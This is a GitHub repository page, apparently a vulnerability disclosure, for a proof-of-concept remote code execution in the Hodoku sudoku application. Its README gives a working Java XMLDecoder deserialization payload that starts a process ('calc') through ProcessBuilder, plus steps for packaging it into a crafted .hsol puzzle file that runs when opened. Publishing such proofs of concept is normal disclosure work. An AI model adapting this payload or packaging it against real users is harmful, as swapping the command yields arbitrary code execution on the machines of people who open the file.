Skip to content

Gelcon/PoC-of-Hodoku-V2.3.0-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
files
files
 
 
img
img
 
 
video
video
 
 
README.md
README.md
 
 

Repository files navigation

Hodoku V2.3.2 RCE

Affected Version: <= v2.3.0(latest release version)

Application: Here

Insecure Deserialization Vulnerability

<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1" >
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>

After saving the above code as PoC.txt, change the file extension to PoC.hsol and package the hsol file into a PoC.zip file. Change the zip file extension to PoC.hsol and click "File" -> "Open Puzzle File" to trigger the vulnerability.

Exploit

image-20241023171749651

image-20241023171820501

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published